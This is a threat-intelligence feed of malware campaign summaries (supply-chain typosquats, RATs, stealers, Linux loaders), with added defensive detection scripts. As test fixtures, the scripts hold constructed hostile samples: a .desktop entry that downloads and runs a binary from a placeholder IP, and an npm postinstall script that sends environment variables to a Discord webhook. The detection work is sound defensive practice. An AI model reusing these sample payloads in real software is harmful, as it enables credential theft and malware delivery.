Researchers at the Splunk Threat Research Team have identified an emerging trend in which adversaries abuse Microsoft's MSIX application packaging format to deliver and conceal malicious payloads. Originally designed to improve Windows app deployment security through signing, validation, and sandboxing, MSIX is now being repurposed by threat actors as a trusted container for malware delivery. Attackers have adapted the format into a Loader-as-a-Service model, selling pre-configured MSIX-based loaders that evade traditional security controls and deliver remote access tools. These malicious packages frequently appear legitimately signed or developer-certified, allowing them to pass SmartScreen and Windows Defender checks. Once executed, they let adversaries establish persistence, run outside the MSIX app container by declaring full-trust packages, and deploy secondary payloads such as remote access trojans.
Source: https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html
2025-10-22
NetHereum_Malicious_NuGet_Typosquat_Attack
HIGH
+
Intel Source:
Socket
Intel Name:
NetHereum_Malicious_NuGet_Typosquat_Attack
Date of Scan:
2025-10-22
Impact:
HIGH
Summary:
Researchers at Socket Threat Research identified a malicious typosquat campaign on the NuGet package ecosystem that impersonated the legitimate Nethereum library used for Ethereum wallet and transaction operations. The threat actor used a homograph attack by replacing a Latin character with a Cyrillic equivalent to create a nearly identical package name, allowing the malicious library to blend seamlessly into developer environments. Once installed, the trojanized code executed obfuscated routines designed to transmit sensitive wallet-related data to an external command-and-control endpoint. The malware leveraged legitimate-looking namespaces and class structures to evade detection and function normally within development workflows, exfiltrating private keys, mnemonics, and signing materials without interrupting visible operations.
Source: https://socket.dev/blog/malicious-nuget-packages-typosquat-nethereum-to-exfiltrate-wallet-keys?utm_medium=feed
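A homograph package id defeats eyeball review and plain string comparison, but it is mechanically easy to catch: any letter outside the Latin script in an otherwise Latin id is a red flag, and folding known confusables back to Latin exposes which trusted package the name is imitating. The check below is an added example (not Socket's scanner); its confusable table is a small hand-picked Cyrillic subset (the Unicode confusables.txt file is the authoritative source), and the allow-list and the lookalike id are constructed for illustration. It covers mixed-script impersonation only; ordinary misspelling typosquats need an edit-distance check.

```python
"""Detect mixed-script (homograph) package ids that impersonate a trusted package.

Added example for this entry, not Socket's scanner. CONFUSABLES is a small hand-picked
subset (assumption: enough for the common Cyrillic/Latin cases; Unicode's confusables.txt
is the authoritative table), and TRUSTED is a constructed allow-list.
"""
import unicodedata
from typing import Dict, Iterable, Optional, Set

# Cyrillic code points that render like Latin letters in most fonts (subset).
CONFUSABLES: Dict[str, str] = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
    "\u0425": "X",
}

def scripts_in(name: str) -> Set[str]:
    """Unicode script family of every letter in the id (LATIN, CYRILLIC, ...)."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in name if ch.isalpha()}

def skeleton(name: str) -> str:
    """Fold confusables to their Latin look-alikes and case-fold, for comparison."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name).casefold()

def check_package(name: str, trusted: Iterable[str]) -> dict:
    """Verdict for one package id against a trusted allow-list.

    NuGet ids are case-insensitive, so a pure case difference is the same package;
    only a skeleton match with a *different* case-folded id counts as impersonation.
    """
    sk = skeleton(name)
    impersonates: Optional[str] = None
    for t in trusted:
        if t.casefold() != name.casefold() and t.casefold() == sk:
            impersonates = t
            break
    return {
        "name": name,
        "non_ascii": [f"U+{ord(ch):04X}" for ch in name if ord(ch) > 0x7F],
        "mixed_script": len(scripts_in(name)) > 1,
        "impersonates": impersonates,
    }

def is_suspicious(verdict: dict) -> bool:
    return verdict["impersonates"] is not None or verdict["mixed_script"]

TRUSTED = ["Nethereum", "Nethereum.Web3", "Newtonsoft.Json"]   # constructed allow-list

if __name__ == "__main__":
    # Constructed lookalike: Latin 'e' replaced with Cyrillic IE (U+0435).
    for pkg in ("N\u0435thereum", "Nethereum.Web3", "nethereum"):
        v = check_package(pkg, TRUSTED)
        print(pkg, "SUSPICIOUS" if is_suspicious(v) else "ok", v["non_ascii"], v["impersonates"])
```

Run it over every id in a lock file or packages.config during CI; a mixed-script hit with an impersonation target is a block, and a mixed-script hit with no target still deserves a manual look because the allow-list will never be complete.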
2025-10-22
CAPI_Backdoor_DOTNET_Stealer_Targeting_Russia
HIGH
+
Intel Source:
Seqrite Labs
Intel Name:
CAPI_Backdoor_DOTNET_Stealer_Targeting_Russia
Date of Scan:
2025-10-22
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified a targeted cyber campaign directed against the Russian automotive and e-commerce sectors, leveraging a previously unknown .NET-based malware dubbed CAPI Backdoor. The campaign began in early October 2025 and was initiated through spear-phishing emails containing ZIP archives that delivered a malicious LNK file and a decoy tax document designed to appear legitimate to Russian employees. Once executed, the malware deployed a .NET DLL implant that enabled data theft, remote command execution, and persistent access. CAPI Backdoor demonstrates the ability to collect browser credentials, capture screenshots, and exfiltrate information while maintaining communication with its command infrastructure using standard network ports to blend with normal traffic.
Source: https://www.seqrite.com/blog/seqrite-capi-backdoor-dotnet-stealer-russian-auto-commerce-oct-2025/
2025-10-22
HaiBot_Target_Linux_SSH_Server
MEDIUM
+
Intel Source:
ASEC
Intel Name:
HaiBot_Target_Linux_SSH_Server
Date of Scan:
2025-10-22
Impact:
MEDIUM
Summary:
ASEC researchers have observed a significant increase in brute-force attacks and malware activity targeting Linux SSH servers. HaiBot is one such payload: after attackers gain SSH access, automated scripts download its source code, compile it with gcc, and run the result directly on the compromised host. Once deployed, HaiBot connects to a command server and polls it regularly for new instructions. When triggered, it launches UDP flood attacks, sending NULL bytes or repeated character streams to overwhelm the target. The malware relies on plain HTTP for C2 and contains a Vietnamese-language string in its parameters, suggesting the developer may be Vietnamese, though attribution remains unconfirmed. Overall, HaiBot is a low-complexity but effective DDoS bot that quickly weaponizes compromised Linux systems.
Source: https://asec.ahnlab.com/en/90569/
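Two things in this chain are visible in ordinary host logs: a password login that arrives after a burst of failures from the same source, and a compiler invoked against files in a scratch directory. The following added example (not ASEC's content) implements both checks over constructed auth.log lines and command lines; the failure threshold is an assumption to tune, and the IPs and paths are placeholders.

```python
"""Spot a brute-force login that succeeded, then the compile-on-host step that follows.

Added example for this entry, not ASEC's detection content. The auth.log lines, IPs
and command lines are constructed; the failure threshold is an assumption to tune.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

AUTH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) (\w+) for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_bruteforce_success(lines: Iterable[str], threshold: int = 5) -> List[Dict]:
    """Alert when a source IP logs in after accumulating >= threshold failed attempts."""
    failures: Dict[str, int] = defaultdict(int)
    alerts: List[Dict] = []
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        outcome, method, user, ip = m.groups()
        if outcome == "Failed":
            failures[ip] += 1
            continue
        # Accepted: judge it against the failures that preceded it, then reset the counter.
        if failures[ip] >= threshold:
            alerts.append({"ip": ip, "user": user, "method": method, "failures": failures[ip]})
        failures[ip] = 0
    return alerts

COMPILER_RE = re.compile(r"(?:^|/|\s)(?:gcc|cc|g\+\+|clang|tcc)\s")
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

def suspicious_compile(cmdline: str) -> bool:
    """True for a compiler run whose inputs or output live in a scratch directory."""
    if not COMPILER_RE.search(cmdline):
        return False
    return any(tok.startswith(SCRATCH_DIRS) for tok in cmdline.split())

# Constructed auth.log excerpt: six failures then a password login from one IP,
# and an unrelated key-based login from another.
SAMPLE_AUTH_LOG = [
    "Oct 20 03:14:07 srv sshd[2113]: Failed password for root from 203.0.113.9 port 51122 ssh2",
    "Oct 20 03:14:09 srv sshd[2115]: Failed password for invalid user admin from 203.0.113.9 port 51130 ssh2",
    "Oct 20 03:14:11 srv sshd[2117]: Failed password for root from 203.0.113.9 port 51136 ssh2",
    "Oct 20 03:14:13 srv sshd[2119]: Failed password for invalid user oracle from 203.0.113.9 port 51140 ssh2",
    "Oct 20 03:14:15 srv sshd[2121]: Failed password for root from 203.0.113.9 port 51144 ssh2",
    "Oct 20 03:14:17 srv sshd[2123]: Failed password for root from 203.0.113.9 port 51150 ssh2",
    "Oct 20 03:15:40 srv sshd[2250]: Accepted password for root from 203.0.113.9 port 51400 ssh2",
    "Oct 20 03:16:02 srv sshd[2290]: Accepted publickey for deploy from 198.51.100.20 port 40122 ssh2",
]

if __name__ == "__main__":
    for a in detect_bruteforce_success(SAMPLE_AUTH_LOG):
        print("brute-force success:", a)
    for cmd in ("gcc /tmp/.x/hai.c -o /tmp/.x/hai -lpthread", "gcc -O2 src/main.c -o build/app"):
        print(cmd, "->", suspicious_compile(cmd))
```

The login check is order-based rather than time-based because syslog-style auth.log lines carry no year; on a busy bastion you would window the failure counter by time as well. The compile check is a hunting aid, not an alert on its own: build hosts compile in /tmp legitimately, so pair it with the login alert or with a following outbound UDP burst.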
2025-10-21
NightMARE_Tool_Aids_Lumma_Stealer_Analysis
MEDIUM
+
Intel Source:
Elastic Security Labs
Intel Name:
NightMARE_Tool_Aids_Lumma_Stealer_Analysis
Date of Scan:
2025-10-21
Impact:
MEDIUM
Summary:
Researchers at Elastic Security Labs have released NightMARE v0.16, a Python-based reverse engineering and emulation framework designed to automate malware configuration extraction and analysis. Demonstrated against Lumma Stealer (LummaC2), a credential-stealing malware still active in global campaigns despite a May 2025 takedown—NightMARE helps overcome Lumma’s use of control flow obfuscation and ChaCha20-based encryption that complicates static analysis. The framework integrates Rizin for disassembly and Unicorn for emulation, allowing analysts to execute cryptographic routines directly from the malware binary without manual reimplementation. In Elastic’s example, analysts successfully recovered Lumma’s encrypted C2 configuration by identifying keys, locating the ChaCha20 context, and invoking the embedded decryption routine within the emulated environment. The decrypted infrastructure revealed active domains, all aligning with previously observed Lumma operations.
Source: https://www.elastic.co/security-labs/nightmare-on-0xelm-street
2025-10-21
XiebroC2_MS_SQL_Server_Intrusions
HIGH
+
Intel Source:
ASEC
Intel Name:
XiebroC2_MS_SQL_Server_Intrusions
Date of Scan:
2025-10-21
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing malicious activity in Q3 2025 targeting Windows-based MS-SQL servers through credential compromise followed by post-exploitation abuse. Attackers used CLR Shell (a command shell loaded into SQL Server as a CLR assembly) and Potato-family privilege escalation tools to gain execution and elevate privileges, then deployed command-and-control frameworks such as XiebroC2, Cobalt Strike, and Meterpreter. The open-source XiebroC2 framework lets adversaries perform remote operations including data collection, process manipulation, and defense evasion across compromised servers. In observed cases, attackers used PowerShell and JuicyPotato for privilege escalation and lateral movement, while additional tools such as proxyware and CoinMiner were used to monetize infected environments through bandwidth theft or cryptocurrency mining.
Source: https://asec.ahnlab.com/en/90572/
2025-10-21
Odyssey_Stealer_Fake_macOS_Tools_Target_Developers
HIGH
+
Intel Source:
Hunt.IO
Intel Name:
Odyssey_Stealer_Fake_macOS_Tools_Target_Developers
Date of Scan:
2025-10-21
Impact:
HIGH
Summary:
Researchers at Hunt.io have identified a coordinated campaign using Odyssey Stealer and AMOS (Atomic macOS Stealer) to target macOS developers through fake software download sites impersonating trusted tools such as Homebrew, TradingView, and LogMeIn. The operation exploits developer trust with social engineering and malicious installation commands disguised as legitimate terminal actions. Once executed, the payloads install stealers that exfiltrate browser data, cryptocurrency credentials, and system information. The campaign's infrastructure shows organized reuse of servers, SSL certificates, and domain registrations, suggesting a mature operational backend maintained across multiple iterations. The malware uses advanced evasion techniques, including AppleScript-based anti-analysis checks, layered shell execution, and privilege escalation attempts, and its delivery through user-typed terminal commands sidesteps the Gatekeeper checks that would apply to a downloaded app bundle.
Source: https://hunt.io/blog/macos-odyssey-amos-malware-campaign
2025-10-20
TA585_MonsterV2_Malware_Operations
HIGH
+
Intel Source:
Proofpoint
Intel Name:
TA585_MonsterV2_Malware_Operations
Date of Scan:
2025-10-20
Impact:
HIGH
Summary:
Researchers at Proofpoint have identified a new cybercriminal actor, TA585, conducting sophisticated malware campaigns distributing the MonsterV2 remote access trojan (RAT), stealer, and loader. The group operates its own infrastructure and employs unique web injection and filtering techniques that enable realistic phishing and malware delivery operations. TA585’s activity began in early 2025, using U.S. government-themed lures impersonating the IRS and Small Business Administration to compromise victims, primarily within finance and accounting sectors. The infection chain leverages fake verification pages and PowerShell-based payload execution through a tactic Proofpoint refers to as “ClickFix.” Once deployed, MonsterV2 provides full-featured capabilities, including credential and data theft, HVNC-based remote access, and command execution.
Source: https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal
2025-10-20
Discord_C2_in_Open_Source_Packages
MEDIUM
+
Intel Source:
Socket
Intel Name:
Discord_C2_in_Open_Source_Packages
Date of Scan:
2025-10-20
Impact:
MEDIUM
Summary:
Researchers at Socket have identified a cross-ecosystem campaign in which threat actors weaponize Discord webhooks as command-and-control (C2) channels across the npm, PyPI, and RubyGems package repositories. These malicious packages were designed to steal developer and system data by embedding hard-coded webhook URLs into installation or execution routines. Upon execution, the malware exfiltrates environment variables, configuration files, and credentials to Discord-controlled endpoints using encrypted HTTPS traffic. This technique allows attackers to avoid maintaining dedicated infrastructure while blending exfiltration activity within legitimate Discord traffic. The malicious code samples observed demonstrate consistent tactics such as targeting configuration and credential files, modifying setup or install scripts for persistence, and using multilingual decoys to obscure intent—suggesting a single actor or tightly linked group.
Source: https://socket.dev/blog/weaponizing-discord-for-command-and-control?utm_medium=feed
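Both this campaign and the AdaptixC2 npm package earlier in this feed rely on the same two properties: a hook that runs at install time, and a hard-coded endpoint to send data to. The scanner below is an added example (not Socket's tooling) that covers both entries: it lists npm lifecycle hooks and setup.py install-command overrides, and finds literal Discord webhook URLs together with nearby credential or environment reads. The package.json, setup.py and helper-script contents are constructed. Literal URL matching is the floor; split, concatenated or base64-wrapped URLs need a decoding pass this example does not attempt.

```python
"""Scan an unpacked package for install-time hooks and Discord webhook exfiltration.

Added example for this entry (and for the npm case in the AdaptixC2 item above), not
Socket's scanner. All manifest and script contents below are constructed.
"""
import json
import re
from typing import Dict, List

WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}   # run on `npm install`
# setup.py patterns that mean code runs at `pip install` time.
PY_INSTALL_HOOK_RE = re.compile(r"cmdclass\s*=|setuptools\.command\.(?:install|develop|egg_info)")
SENSITIVE_RE = re.compile(r"process\.env|os\.environ|\.npmrc|\.ssh/|\.aws/credentials|\.git-credentials")

def scan_npm_manifest(package_json: str) -> List[str]:
    pkg = json.loads(package_json)
    return [f"npm hook {h}: {c}" for h, c in pkg.get("scripts", {}).items() if h in NPM_INSTALL_HOOKS]

def scan_setup_py(setup_py: str) -> List[str]:
    return ["setup.py overrides an install command"] if PY_INSTALL_HOOK_RE.search(setup_py) else []

def scan_code(label: str, code: str) -> List[str]:
    findings = [f"{label}: Discord webhook {u}" for u in sorted(set(WEBHOOK_RE.findall(code)))]
    if findings and SENSITIVE_RE.search(code):
        findings.append(f"{label}: reads credentials/environment alongside the webhook")
    return findings

def scan_package(files: Dict[str, str]) -> List[str]:
    """files maps relative path -> contents for an unpacked package; returns all findings."""
    findings: List[str] = []
    for path, content in files.items():
        if path.endswith("package.json"):
            findings += scan_npm_manifest(content)
        elif path.endswith("setup.py"):
            findings += scan_setup_py(content)
        findings += scan_code(path, content)
    return findings

# Constructed npm package: postinstall hook posts the whole environment to a webhook.
SAMPLE_NPM = {
    "package.json": json.dumps({
        "name": "color-utils-helper",
        "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js", "test": "echo ok"},
    }),
    "setup.js": (
        "const https = require('https');\n"
        "const hook = 'https://discord.com/api/webhooks/1234567890123456789/ExampleTokenValue_abc-XYZ';\n"
        "const body = JSON.stringify({content: JSON.stringify(process.env)});\n"
        "https.request(hook, {method: 'POST'}).end(body);\n"
    ),
}
# Constructed PyPI package: install command subclass that imports a beacon module.
SAMPLE_PYPI = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class Post(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "        import beacon\n"
        "setup(name='req-utils', cmdclass={'install': Post})\n"
    ),
}
CLEAN_NPM = {
    "package.json": json.dumps({"name": "left-pad-ish", "scripts": {"test": "jest"}}),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

if __name__ == "__main__":
    for name, files in (("npm sample", SAMPLE_NPM), ("pypi sample", SAMPLE_PYPI), ("clean", CLEAN_NPM)):
        print(name, "->", scan_package(files) or ["nothing flagged"])
```

A lifecycle hook by itself is common in legitimate packages (native builds, for instance), so the useful signal is the combination: a hook plus an outbound endpoint plus credential reads. Setting ignore-scripts=true in .npmrc for CI installs removes the execution vector entirely for npm; pip has no equivalent switch, so setup.py overrides in a dependency always warrant a look.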
2025-10-20
StealthServer_APT36_Cross_Platform_Backdoor
HIGH
+
Intel Source:
Qianxin X Lab
Intel Name:
StealthServer_APT36_Cross_Platform_Backdoor
Date of Scan:
2025-10-20
Impact:
HIGH
Summary:
Researchers at Qianxin XLab have uncovered StealthServer, a Go-based backdoor active since July 2025 that targets both Windows and Linux. It supports modular C2 over TCP, HTTP, and WebSocket, uses anti-analysis techniques (junk-code obfuscation and anti-VM checks), and blends its traffic with requests to benign domains. Attribution indicators, including .desktop-based Linux loaders, government-themed phishing lures, and C2 overlaps, point to APT36, a Pakistan-linked espionage actor targeting South Asian defense and research organizations. The malware drops decoy conference and procurement documents to mask its activity, uses encrypted JSON-based C2 for remote command execution and file exfiltration, and establishes OS-specific persistence: registry keys and PowerShell-launched LNK autostart entries on Windows, systemd services and crontab entries on Linux. Multiple variants were identified (Windows V1 to V3, Linux V1 and V2), and C2 is spread across several hosting providers, including ALEXHOST SRL, IP Connect Inc, and Shinjiru Technology, for resilience.
Source: https://blog.xlab.qianxin.com/apt-stealthserver-cn/
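StealthServer and DeskRAT (the Sekoia entry earlier in this feed) share the same Linux foothold pattern: a .desktop entry that looks like a document but runs a loader, and systemd or cron entries that point at a binary hidden under the home directory. The audit below is an added example covering both entries (it is not XLab's or Sekoia's code). It parses .desktop and systemd unit files and applies three heuristics that are my assumptions about what separates these loaders from normal entries: network fetch or shell evaluation at launch, execution from scratch or hidden directories, and document-named entries that run a command chain. The sample files are constructed; crontab command fields can be passed through suspicious_command() the same way.

```python
"""Audit Linux autostart artifacts (.desktop entries, systemd units) for loader behaviour.

Added example covering the DeskRAT and StealthServer entries in this feed; not Sekoia's
or XLab's code. The sample files are constructed and the heuristics are assumptions.
"""
import configparser
import re
from typing import List

FETCH_OR_EVAL_RE = re.compile(
    r"\b(?:curl|wget)\b|\b(?:ba)?sh\s+-c\b|\bpython3?\s+-c\b|\bbase64\s+(?:-d|--decode)\b|\bchmod\s+\+x\b"
)
ABS_PATH_RE = re.compile(r"(?<![\w.])(?:/[^\s'\"&;|<>/]+)+")   # absolute paths in a command
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
HIDDEN_OK = {".config", ".local", ".cache"}    # ordinary XDG homes for user services
DOC_NAME_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$", re.I)
CHAIN_RE = re.compile(r"&&|\|\||;|(?<!&)&(?!&)|\|")

def suspicious_command(cmd: str) -> List[str]:
    """Reasons a launch command looks like a loader rather than an application."""
    reasons: List[str] = []
    if FETCH_OR_EVAL_RE.search(cmd):
        reasons.append("downloads or evaluates code at launch")
    for path in ABS_PATH_RE.findall(cmd):
        if path.startswith(SCRATCH_DIRS):
            reasons.append("runs from world-writable dir")
        elif any(p.startswith(".") and p not in HIDDEN_OK for p in path.split("/")[1:-1]):
            reasons.append("hidden directory in path")
    return sorted(set(reasons))

def _parse(text: str) -> configparser.ConfigParser:
    # Both formats are INI-like; keys are case-sensitive, '=' is the only delimiter,
    # and systemd allows repeated keys (strict=False keeps the last one).
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp

def audit_desktop(text: str) -> List[str]:
    entry = _parse(text)["Desktop Entry"]
    cmd, name = entry.get("Exec", ""), entry.get("Name", "")
    reasons = suspicious_command(cmd)
    if DOC_NAME_RE.search(name) and CHAIN_RE.search(cmd):
        reasons.append("document-named entry runs a command chain")
    return reasons

def audit_unit(text: str) -> List[str]:
    cp = _parse(text)
    reasons: List[str] = []
    if cp.has_section("Service"):
        for key in ("ExecStartPre", "ExecStart", "ExecStartPost"):
            reasons += suspicious_command(cp["Service"].get(key, ""))
    return sorted(set(reasons))

# Constructed .desktop loader: fetches a binary to /tmp, runs it, then opens a decoy PDF.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Procurement_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://203.0.113.5/d -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x & xdg-open /tmp/decoy.pdf"
"""
# Constructed user unit pointing at a binary in a hidden directory under ~/.config.
SAMPLE_UNIT = """[Unit]
Description=Desktop Sync
[Service]
ExecStart=/home/user/.config/.sync/updater --daemon
Restart=always
[Install]
WantedBy=default.target
"""
CLEAN_UNIT = """[Service]
ExecStart=/usr/bin/syncthing serve --no-browser
"""

if __name__ == "__main__":
    print("desktop:", audit_desktop(SAMPLE_DESKTOP))
    print("unit:   ", audit_unit(SAMPLE_UNIT))
    print("clean:  ", audit_unit(CLEAN_UNIT) or ["ok"])
```

Sweep ~/.config/autostart, ~/.config/systemd/user, /etc/systemd/system and the user crontabs with these functions; the hidden-directory rule is deliberately loose (a nested dot-directory under .config or .local is unusual for packaged software), so tune HIDDEN_OK to your fleet before alerting on it.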
2025-10-19
Astaroth_Trojan_GitHub_Based_C2_Resilience
HIGH
+
Intel Source:
McAfee
Intel Name:
Astaroth_Trojan_GitHub_Based_C2_Resilience
Date of Scan:
2025-10-19
Impact:
HIGH
Summary:
Researchers at McAfee Labs have identified a new campaign involving the Astaroth banking trojan, which uses GitHub repositories to make its command-and-control (C2) infrastructure more resilient. Astaroth, known for targeting banking users in South America, particularly Brazil, arrives in phishing emails containing malicious ZIP files; these hold LNK shortcuts that launch obfuscated JavaScript downloaders. Once executed, the scripts use mshta.exe to retrieve an AutoIt loader, an encrypted payload, and configuration files from multiple online sources. The payload, written in Delphi, has strong anti-analysis and sandbox-evasion features, including system locale checks and a shutdown routine triggered when debugging tools are detected. Astaroth maintains persistence through Startup folder entries and exfiltrates credentials captured by keylogging and browser session hijacking. Its novel C2 approach combines Ngrok reverse proxies with GitHub-hosted steganographic images that carry configuration updates every few hours, allowing the operators to recover quickly from takedowns.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/
2025-10-18
Malicious_NPM_Packages_Targets_over_135_Organisation
MEDIUM
+
Intel Source:
Socket
Intel Name:
Malicious_NPM_Packages_Targets_over_135_Organisation
Date of Scan:
2025-10-18
Impact:
MEDIUM
Summary:
Researchers at Socket have uncovered a coordinated phishing operation that uses the npm registry and the unpkg CDN to host malicious redirector scripts. The threat actors published approximately 175 deceptive npm packages, collectively downloaded more than 26,000 times, that serve as delivery infrastructure for phishing rather than as executable malware. The campaigns use HTML lure files, often disguised as purchase orders or project documents, that dynamically load JavaScript redirectors from the CDN and send victims to Microsoft 365-themed phishing pages built to harvest credentials. Each lure is customized with victim-specific details such as the organization's name and email address, which lets the attackers track and manage individual targets. The campaign primarily hits the industrial, technology, and energy sectors across Western Europe, with additional activity in the Nordic and Asia-Pacific regions. Its ultimate goal is Business Email Compromise (BEC) enabled by credential theft, exploiting the trust placed in the npm ecosystem for large-scale phishing.
Source: https://socket.dev/blog/175-malicious-npm-packages-host-phishing-infrastructure?utm_medium=feed
2025-10-18
New_Stealit_Campaign_Abuses_NodeJS
LOW
+
Intel Source:
Fortinet
Intel Name:
New_Stealit_Campaign_Abuses_NodeJS
Date of Scan:
2025-10-18
Impact:
LOW
Summary:
Researchers at FortiGuard have identified a renewed StealIt malware operation that has shifted from Electron-based builds to a single-executable NodeJS format. The threat actor now markets StealIt as a commercial service, offering both Windows and Android versions with lifetime subscriptions. The malware is distributed through fake installers on file-sharing sites and social media. Once installed, it can steal files and credentials, control the victim’s devices, and run remote commands. It also features live screen and webcam streaming, file collection, persistence mechanisms, and fake alerts to deceive users. To evade analysis and detection, StealIt uses multistage obfuscation along with anti-VM, anti-debug, and process-checking techniques. The client even includes a ransom-chat feature, so attackers could use it for extortion as well as data theft.
Source: https://www.fortinet.com/blog/threat-research/stealit-campaign-abuses-nodejs-single-executable-application
2025-10-17
Cavalry_Werewolf_Public_Sector_Phishing_Campaigns
HIGH
+
Intel Source:
BI.ZONE
Intel Name:
Cavalry_Werewolf_Public_Sector_Phishing_Campaigns
Date of Scan:
2025-10-17
Impact:
HIGH
Summary:
Researchers at BI.ZONE have identified a series of targeted phishing operations conducted by the threat actor known as Cavalry Werewolf between May and August 2025. The campaigns exploited trusted relationships by leveraging legitimate or compromised Kyrgyz government email accounts to send lures to Russian ministries and enterprises. These emails were crafted with document-themed attachments designed to deliver custom malware, notably FoalShell and StallionRAT, enabling remote access, persistence, and data theft. The actor demonstrated both intent and capability to undermine Russian public institutions, with specific ministries of Economy, Culture, and Sport among the victims. Beyond Russia, preparations for operations were also noted in Tajikistan and the Middle East, indicating a broader regional scope.
Source: https://bi.zone/eng/expertise/blog/cavalry-werewolf-atakuet-rossiyu-cherez-doveritelnye-otnosheniya-mezhdu-gosudarstvami/
2025-10-17
MAC_Spoofer_Malicious_Chrome_Extension_Scam
MEDIUM
Intel Source:
Cofense
Intel Name:
MAC_Spoofer_Malicious_Chrome_Extension_Scam
Date of Scan:
2025-10-17
Impact:
MEDIUM
Summary:
Researchers at Cofense Phishing Defense Center have identified a phishing campaign distributing a malicious Chrome extension named “MAC Spoofer,” which masquerades as a privacy tool promising anonymity and a $50,000 prize incentive. The campaign uses social engineering through email attachments, instructing recipients to manually install the extension and follow a guide that appears legitimate. Once installed, the extension captures user credentials during login attempts to financial and non-financial websites, transmitting them to attacker-controlled infrastructure. The fake extension claims to randomize a user’s MAC address but contains no code supporting this functionality. Instead, it leverages legitimate libraries to conceal its true purpose of credential theft. The campaign demonstrates a shift from conventional phishing methods, exploiting users’ familiarity with browser extensions and sideloading features to achieve persistence and data exfiltration.
Source: https://cofense.com/blog/privacy%E2%80%9D-and-prizes%E2%80%9D-rewards-from-a-malicious-browser-extension
2025-10-17
UNC5342_Using_Blockchain_for_Malware_Delivery
HIGH
Intel Source:
Google Threat Intelligence (Mandiant)
Intel Name:
UNC5342_Using_Blockchain_for_Malware_Delivery
Date of Scan:
2025-10-17
Impact:
HIGH
Summary:
Researchers at Google Threat Intelligence Group (Mandiant) have uncovered a novel malware delivery technique known as EtherHiding, used by North Korea–linked threat actor UNC5342 to support cryptocurrency theft and cyber-espionage. Active since February 2025, the group has incorporated EtherHiding into its ongoing Contagious Interview campaign, which targets software and cryptocurrency developers through fake job interviews and malicious coding tasks. Victims are lured into downloading JavaScript packages containing the JADESNOW downloader, which then fetches a JavaScript variant of the INVISIBLEFERRET backdoor. EtherHiding leverages smart contracts on BNB Smart Chain and Ethereum to embed payloads, effectively transforming blockchain infrastructure into a resilient, decentralized C2 mechanism that evades takedown by using read-only blockchain calls such as eth_call for stealthy, fileless retrieval without incurring gas fees. This technique supports multi-stage infections across Windows, macOS, and Linux, with the final INVISIBLEFERRET.JAVASCRIPT payload connecting over TCP port 3306 (MySQL) to exfiltrate credentials, host metadata, browser data, and crypto wallets such as MetaMask and Phantom.
Source: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding/
2025-10-17
Silk_Lure_DLL_Side_Loading_Espionage_Campaign
HIGH
Intel Source:
Seqrite
Intel Name:
Silk_Lure_DLL_Side_Loading_Espionage_Campaign
Date of Scan:
2025-10-17
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified an ongoing cyber-espionage operation dubbed “Silk Lure”, which leverages scheduled tasks and DLL side-loading techniques to deploy a remote access trojan known as ValleyRAT. The campaign uses a Chinese-language résumé decoy to socially engineer victims, primarily targeting individuals in financial technology, cryptocurrency, and trading platform sectors. Once the malicious shortcut file is executed, it triggers a PowerShell command chain that downloads and launches a VBScript, which establishes persistence via a Windows scheduled task. This persistence mechanism executes a loader binary that sideloads a malicious DLL, enabling covert delivery of the final payload. The malware exhibits advanced features such as system reconnaissance, anti-virtualization checks, and antivirus evasion through WMI queries and process termination.
Source: https://www.seqrite.com/blog/operation-silk-lure-scheduled-tasks-weaponized-for-dll-side-loading-drops-valleyrat/
2025-10-16
Distribution_of_Trojanized_Ivanti_Pulse_Secure
MEDIUM
Intel Source:
Zscaler
Intel Name:
Distribution_of_Trojanized_Ivanti_Pulse_Secure
Date of Scan:
2025-10-16
Impact:
MEDIUM
Summary:
Researchers at Zscaler have identified an ongoing campaign that leverages SEO poisoning techniques to distribute a trojanized version of the Ivanti Pulse Secure VPN client. The attackers create deceptive websites that appear prominently in Bing search results and redirect users to attacker-controlled infrastructure. The malicious installer, digitally signed to appear legitimate, deploys weaponized DLLs designed to harvest saved VPN connection details from the Ivanti client’s configuration store. Additionally, the campaign employs referrer-based content switching, displaying benign content when accessed directly but delivering the malicious payload when reached via Bing. The attacker’s objective is to use the stolen VPN credentials to gain initial access and then conduct reconnaissance, lateral movement, and potentially ransomware deployment.
Source: https://www.zscaler.com/blogs/security-research/spoofed-ivanti-vpn-client-sites
2025-10-16
Python_Infostealer_Clipboard_Image_Theft
MEDIUM
Intel Source:
ISC.SANS
